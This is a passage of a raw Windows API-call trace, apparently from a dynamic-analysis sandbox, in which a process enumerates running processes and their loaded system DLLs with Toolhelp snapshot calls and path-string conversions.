	[0106.029] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Program Files (x86)\\MSBuild\\semi bay.exe", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files (x86)\\MSBuild\\semi bay.exe", lpUsedDefaultChar=0x0) returned 44
	[0106.029] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="semi bay.exe", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="semi bay.exe", lpUsedDefaultChar=0x0) returned 13
	[0106.029] Module32NextW (hSnapshot=0x854, lpme=0x20af280) returned 1
	[0106.030] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\ntdll.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\ntdll.dll", lpUsedDefaultChar=0x0) returned 30
	[0106.030] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ntdll.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ntdll.dll", lpUsedDefaultChar=0x0) returned 10
	[0106.030] Module32NextW (hSnapshot=0x854, lpme=0x20af280) returned 1
	[0106.030] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\KERNEL32.DLL", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\KERNEL32.DLL", lpUsedDefaultChar=0x0) returned 33
	[0106.030] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="KERNEL32.DLL", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="KERNEL32.DLL", lpUsedDefaultChar=0x0) returned 13
	[0106.030] Module32NextW (hSnapshot=0x854, lpme=0x20af280) returned 1
	[0106.031] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\KERNELBASE.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\KERNELBASE.dll", lpUsedDefaultChar=0x0) returned 35
	[0106.031] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="KERNELBASE.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="KERNELBASE.dll", lpUsedDefaultChar=0x0) returned 15
	[0106.031] Module32NextW (hSnapshot=0x854, lpme=0x20af280) returned 1
	[0106.050] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\system32\\apphelp.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\system32\\apphelp.dll", lpUsedDefaultChar=0x0) returned 32
	[0106.050] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="apphelp.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="apphelp.dll", lpUsedDefaultChar=0x0) returned 12
	[0106.050] Module32NextW (hSnapshot=0x854, lpme=0x20af280) returned 1
	[0106.051] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\USER32.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\USER32.dll", lpUsedDefaultChar=0x0) returned 31
	[0106.051] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="USER32.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="USER32.dll", lpUsedDefaultChar=0x0) returned 11
	[0106.051] Module32NextW (hSnapshot=0x854, lpme=0x20af280) returned 1
	[0106.052] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\GDI32.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\GDI32.dll", lpUsedDefaultChar=0x0) returned 30
	[0106.052] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="GDI32.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GDI32.dll", lpUsedDefaultChar=0x0) returned 10
	[0106.052] Module32NextW (hSnapshot=0x854, lpme=0x20af280) returned 1
	[0106.052] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\IMM32.DLL", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\IMM32.DLL", lpUsedDefaultChar=0x0) returned 30
	[0106.052] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="IMM32.DLL", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="IMM32.DLL", lpUsedDefaultChar=0x0) returned 10
	[0106.052] Module32NextW (hSnapshot=0x854, lpme=0x20af280) returned 1
	[0106.053] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\system32\\uxtheme.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\system32\\uxtheme.dll", lpUsedDefaultChar=0x0) returned 32
	[0106.053] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="uxtheme.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uxtheme.dll", lpUsedDefaultChar=0x0) returned 12
	[0106.053] Module32NextW (hSnapshot=0x854, lpme=0x20af280) returned 1
	[0106.054] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\msvcrt.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\msvcrt.dll", lpUsedDefaultChar=0x0) returned 31
	[0106.054] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msvcrt.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="msvcrt.dll", lpUsedDefaultChar=0x0) returned 11
	[0106.054] Module32NextW (hSnapshot=0x854, lpme=0x20af280) returned 1
	[0106.055] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\combase.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\combase.dll", lpUsedDefaultChar=0x0) returned 32
	[0106.055] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="combase.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="combase.dll", lpUsedDefaultChar=0x0) returned 12
	[0106.055] Module32NextW (hSnapshot=0x854, lpme=0x20af280) returned 1
	[0106.056] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\RPCRT4.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\RPCRT4.dll", lpUsedDefaultChar=0x0) returned 31
	[0106.056] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="RPCRT4.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RPCRT4.dll", lpUsedDefaultChar=0x0) returned 11
	[0106.056] Module32NextW (hSnapshot=0x854, lpme=0x20af280) returned 1
	[0106.057] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\SspiCli.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\SspiCli.dll", lpUsedDefaultChar=0x0) returned 32
	[0106.057] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SspiCli.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SspiCli.dll", lpUsedDefaultChar=0x0) returned 12
	[0106.057] Module32NextW (hSnapshot=0x854, lpme=0x20af280) returned 1
	[0106.058] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\CRYPTBASE.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\CRYPTBASE.dll", lpUsedDefaultChar=0x0) returned 34
	[0106.058] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CRYPTBASE.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CRYPTBASE.dll", lpUsedDefaultChar=0x0) returned 14
	[0106.058] Module32NextW (hSnapshot=0x854, lpme=0x20af280) returned 1
	[0106.059] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\bcryptPrimitives.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\bcryptPrimitives.dll", lpUsedDefaultChar=0x0) returned 41
	[0106.059] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="bcryptPrimitives.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bcryptPrimitives.dll", lpUsedDefaultChar=0x0) returned 21
	[0106.059] Module32NextW (hSnapshot=0x854, lpme=0x20af280) returned 1
	[0106.060] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\sechost.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\sechost.dll", lpUsedDefaultChar=0x0) returned 32
	[0106.060] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="sechost.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sechost.dll", lpUsedDefaultChar=0x0) returned 12
	[0106.060] Module32NextW (hSnapshot=0x854, lpme=0x20af280) returned 1
	[0106.060] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\MSCTF.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\MSCTF.dll", lpUsedDefaultChar=0x0) returned 30
	[0106.060] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSCTF.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MSCTF.dll", lpUsedDefaultChar=0x0) returned 10
	[0106.060] Module32NextW (hSnapshot=0x854, lpme=0x20af280) returned 1
	[0106.061] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\system32\\dwmapi.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\system32\\dwmapi.dll", lpUsedDefaultChar=0x0) returned 31
	[0106.061] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="dwmapi.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dwmapi.dll", lpUsedDefaultChar=0x0) returned 11
	[0106.061] Module32NextW (hSnapshot=0x854, lpme=0x20af280) returned 0
	[0106.062] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="semi bay.exe", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="semi bay.exe", lpUsedDefaultChar=0x0) returned 13
	[0106.062] Process32NextW (in: hSnapshot=0x7e4, lppe=0x20af710 | out: lppe=0x20af710*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf08, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x84c, pcPriClassBase=8, dwFlags=0x0, szExeFile="outdoor.exe")) returned 1
	[0106.063] CreateToolhelp32Snapshot (dwFlags=0x8, th32ProcessID=0xf08) returned 0x858
	[0106.070] Module32FirstW (hSnapshot=0x858, lpme=0x20af280) returned 1
	[0106.073] Module32NextW (hSnapshot=0x858, lpme=0x20af280) returned 1
	[0106.074] Module32NextW (hSnapshot=0x858, lpme=0x20af280) returned 1
	[0106.074] Module32NextW (hSnapshot=0x858, lpme=0x20af280) returned 1
	[0106.075] Module32NextW (hSnapshot=0x858, lpme=0x20af280) returned 1
	[0106.076] Module32NextW (hSnapshot=0x858, lpme=0x20af280) returned 1
	[0106.077] Module32NextW (hSnapshot=0x858, lpme=0x20af280) returned 1
	[0106.077] Module32NextW (hSnapshot=0x858, lpme=0x20af280) returned 1
	[0106.078] Module32NextW (hSnapshot=0x858, lpme=0x20af280) returned 1
	[0106.079] Module32NextW (hSnapshot=0x858, lpme=0x20af280) returned 1
	[0106.080] Module32NextW (hSnapshot=0x858, lpme=0x20af280) returned 1
	[0106.080] Module32NextW (hSnapshot=0x858, lpme=0x20af280) returned 1
	[0106.081] Module32NextW (hSnapshot=0x858, lpme=0x20af280) returned 1
	[0106.082] Module32NextW (hSnapshot=0x858, lpme=0x20af280) returned 1
	[0106.083] Module32NextW (hSnapshot=0x858, lpme=0x20af280) returned 1
	[0106.084] Module32NextW (hSnapshot=0x858, lpme=0x20af280) returned 1
	[0106.084] Module32NextW (hSnapshot=0x858, lpme=0x20af280) returned 1
	[0106.107] Module32NextW (hSnapshot=0x858, lpme=0x20af280) returned 1
	[0106.108] Module32NextW (hSnapshot=0x858, lpme=0x20af280) returned 0
	[0106.108] Module32FirstW (hSnapshot=0x858, lpme=0x20af280) returned 1
	[0106.109] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Windows Journal\\outdoor.exe", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Windows Journal\\outdoor.exe", lpUsedDefaultChar=0x0) returned 45
	[0106.109] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="outdoor.exe", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="outdoor.exe", lpUsedDefaultChar=0x0) returned 12
	[0106.109] Module32NextW (hSnapshot=0x858, lpme=0x20af280) returned 1
	[0106.110] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\ntdll.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\ntdll.dll", lpUsedDefaultChar=0x0) returned 30
	[0106.110] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ntdll.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ntdll.dll", lpUsedDefaultChar=0x0) returned 10
	[0106.110] Module32NextW (hSnapshot=0x858, lpme=0x20af280) returned 1
	[0106.111] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\KERNEL32.DLL", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\KERNEL32.DLL", lpUsedDefaultChar=0x0) returned 33
	[0106.111] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="KERNEL32.DLL", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="KERNEL32.DLL", lpUsedDefaultChar=0x0) returned 13
	[0106.111] Module32NextW (hSnapshot=0x858, lpme=0x20af280) returned 1
	[0106.111] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\KERNELBASE.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\KERNELBASE.dll", lpUsedDefaultChar=0x0) returned 35
	[0106.111] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="KERNELBASE.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="KERNELBASE.dll", lpUsedDefaultChar=0x0) returned 15
	[0106.111] Module32NextW (hSnapshot=0x858, lpme=0x20af280) returned 1
	[0106.114] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\system32\\apphelp.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\system32\\apphelp.dll", lpUsedDefaultChar=0x0) returned 32
	[0106.114] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="apphelp.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="apphelp.dll", lpUsedDefaultChar=0x0) returned 12
	[0106.114] Module32NextW (hSnapshot=0x858, lpme=0x20af280) returned 1
	[0106.115] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\USER32.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\USER32.dll", lpUsedDefaultChar=0x0) returned 31
	[0106.115] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="USER32.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="USER32.dll", lpUsedDefaultChar=0x0) returned 11
	[0106.115] Module32NextW (hSnapshot=0x858, lpme=0x20af280) returned 1
	[0106.116] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\GDI32.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\GDI32.dll", lpUsedDefaultChar=0x0) returned 30
	[0106.116] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="GDI32.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GDI32.dll", lpUsedDefaultChar=0x0) returned 10
	[0106.116] Module32NextW (hSnapshot=0x858, lpme=0x20af280) returned 1
	[0106.116] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\IMM32.DLL", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\IMM32.DLL", lpUsedDefaultChar=0x0) returned 30
	[0106.116] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="IMM32.DLL", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="IMM32.DLL", lpUsedDefaultChar=0x0) returned 10
	[0106.117] Module32NextW (hSnapshot=0x858, lpme=0x20af280) returned 1
	[0106.117] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\system32\\uxtheme.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\system32\\uxtheme.dll", lpUsedDefaultChar=0x0) returned 32
	[0106.117] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="uxtheme.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uxtheme.dll", lpUsedDefaultChar=0x0) returned 12
	[0106.117] Module32NextW (hSnapshot=0x858, lpme=0x20af280) returned 1
	[0106.118] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\msvcrt.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\msvcrt.dll", lpUsedDefaultChar=0x0) returned 31
	[0106.118] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msvcrt.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="msvcrt.dll", lpUsedDefaultChar=0x0) returned 11
	[0106.118] Module32NextW (hSnapshot=0x858, lpme=0x20af280) returned 1
	[0106.119] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\combase.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\combase.dll", lpUsedDefaultChar=0x0) returned 32
	[0106.119] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="combase.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="combase.dll", lpUsedDefaultChar=0x0) returned 12
	[0106.119] Module32NextW (hSnapshot=0x858, lpme=0x20af280) returned 1
	[0106.120] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\RPCRT4.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\RPCRT4.dll", lpUsedDefaultChar=0x0) returned 31
	[0106.120] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="RPCRT4.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RPCRT4.dll", lpUsedDefaultChar=0x0) returned 11
	[0106.120] Module32NextW (hSnapshot=0x858, lpme=0x20af280) returned 1
	[0106.121] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\SspiCli.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\SspiCli.dll", lpUsedDefaultChar=0x0) returned 32
	[0106.121] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SspiCli.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SspiCli.dll", lpUsedDefaultChar=0x0) returned 12
	[0106.121] Module32NextW (hSnapshot=0x858, lpme=0x20af280) returned 1
	[0106.122] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\CRYPTBASE.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\CRYPTBASE.dll", lpUsedDefaultChar=0x0) returned 34
	[0106.122] Module32NextW (hSnapshot=0x858, lpme=0x20af280) returned 1
	[0106.123] Module32NextW (hSnapshot=0x858, lpme=0x20af280) returned 1
	[0106.124] Module32NextW (hSnapshot=0x858, lpme=0x20af280) returned 1
	[0106.125] Module32NextW (hSnapshot=0x858, lpme=0x20af280) returned 1
	[0106.125] Module32NextW (hSnapshot=0x858, lpme=0x20af280) returned 0
	[0106.126] Process32NextW (in: hSnapshot=0x7e4, lppe=0x20af710 | out: lppe=0x20af710*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf24, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x84c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wool-parish-horses.exe")) returned 1
	[0106.127] CreateToolhelp32Snapshot (dwFlags=0x8, th32ProcessID=0xf24) returned 0x85c
	[0106.135] Module32FirstW (hSnapshot=0x85c, lpme=0x20af280) returned 1
	[0106.136] Module32NextW (hSnapshot=0x85c, lpme=0x20af280) returned 1
	[0106.137] Module32NextW (hSnapshot=0x85c, lpme=0x20af280) returned 1
	[0106.137] Module32NextW (hSnapshot=0x85c, lpme=0x20af280) returned 1
	[0106.138] Module32NextW (hSnapshot=0x85c, lpme=0x20af280) returned 1
	[0106.139] Module32NextW (hSnapshot=0x85c, lpme=0x20af280) returned 1
	[0106.140] Module32NextW (hSnapshot=0x85c, lpme=0x20af280) returned 1
